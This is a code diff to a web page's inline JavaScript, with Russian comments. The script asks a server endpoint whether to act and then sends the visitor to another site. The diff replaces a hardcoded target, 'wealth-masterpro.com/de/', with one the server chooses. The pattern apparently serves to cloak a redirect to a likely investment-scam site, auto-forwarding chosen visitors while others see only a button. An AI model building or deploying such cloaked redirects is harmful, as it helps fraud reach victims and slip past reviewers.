--- a/index.html
+++ b/index.html
@@ -70,12 +70,12 @@
 <script>
 async function checkStepOne() {
   try {
-    const response = await fetch('/api/check', { cache: "no-store" });
+    const response = await fetch('/api/check', { cache: 'no-store' });
     const result = await response.json();
 
-    if (result.status === 'ok') {
+    if (result.status === 'ok' && result.redirect) {
       setTimeout(() => {
-        window.location.href = 'https://wealth-masterpro.com/de/';
+        window.location.href = result.redirect;
       }, 2000); // Авто-переход через 2 секунды
     } else {
       document.getElementById('watchButton').classList.remove('hidden');
@@ -89,19 +89,21 @@ async function checkStepOne() {
 document.getElementById('watchButton').addEventListener('click', async function(e) {
   e.preventDefault();
   try {
-    const response = await fetch('/api/check', { cache: "no-store" });
+    const response = await fetch('/api/check', { cache: 'no-store' });
     const result = await response.json();
 
-    if (result.status === 'ok') {
-      window.location.href = 'https://wealth-masterpro.com/de/';
+    if (result.status === 'ok' && result.redirect) {
+      window.location.href = result.redirect;
     }
   } catch (error) {
     console.error('Ошибка при переходе:', error);
   }
 });
 
-setTimeout(checkStepOne, 2000); // Старт проверки через 2 секунды после загрузки
+// Старт проверки через 2 секунды после загрузки
+setTimeout(checkStepOne, 2000);
 </script>
+
 
 </body>
 </html>
